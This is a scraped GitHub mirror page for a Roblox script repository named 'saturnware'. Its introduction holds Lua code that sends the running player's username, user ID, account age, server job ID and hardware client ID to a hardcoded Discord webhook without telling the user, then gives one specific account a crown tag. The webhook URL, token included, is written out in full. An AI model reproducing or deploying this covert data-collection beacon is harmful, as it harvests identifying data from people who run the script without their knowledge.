Giter Club home page Giter Club logo

saturnware's Introduction

local webh = "https://discord.com/api/webhooks/1265679987822821446/q8grhaf-1lY4QSVPGNbUwoTeuY5DI6hkEmsOr6aRxCTLNfT-v9sfmOkO7p17FlVfk1HQ"

local syn = {} syn.request = request

local data = { ['embeds'] = { { ['title'] = 'Script executed!', ['description'] = '', ['fields'] = { {name = 'User', value = ""..game:GetService("Players").LocalPlayer.DisplayName.."(@"..game:GetService("Players").LocalPlayer.Name..")"}, {name = "User ID", value = game:GetService("Players").LocalPlayer.UserId, inline = true}, {name = "Account age", value = game:GetService("Players").LocalPlayer.AccountAge.. " days", inline = true}, {name = "JobsID", value = ""..game.JobId..""}, {name = 'Hwid', value = ""..game:GetService("RbxAnalyticsService"):GetClientId()..""}, } } } }

local response = syn.request( { Url = webh, Method = 'POST', Headers = { ['Content-Type'] = 'application/json' }, Body = game:GetService('HttpService'):JSONEncode(data) } )

local function display() for i,v in pairs(game:GetService('Workspace'):GetChildren()) do if v:FindFirstChild('UpperTorso') then print("here") if v:FindFirstChild('UpperTorso'):FindFirstChild('OriginalSize') then local plrcheck = game:GetService('Players'):FindFirstChild(v.Name) if plrcheck then local plrID = game:GetService('Players'):FindFirstChild(v.Name).UserId if plrID == 3578885125 then if v:FindFirstChildWhichIsA('Humanoid') then v:FindFirstChildWhichIsA('Humanoid').DisplayName = ('[๐Ÿ‘‘]' .. game.Players[v.Name].DisplayName) end end end end end end end

while true do wait(3) local succ, errr = pcall(display) end

saturnware's People

Contributors

wfrxsty avatar

Stargazers

 avatar

Watchers

 avatar

saturnware's Issues

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.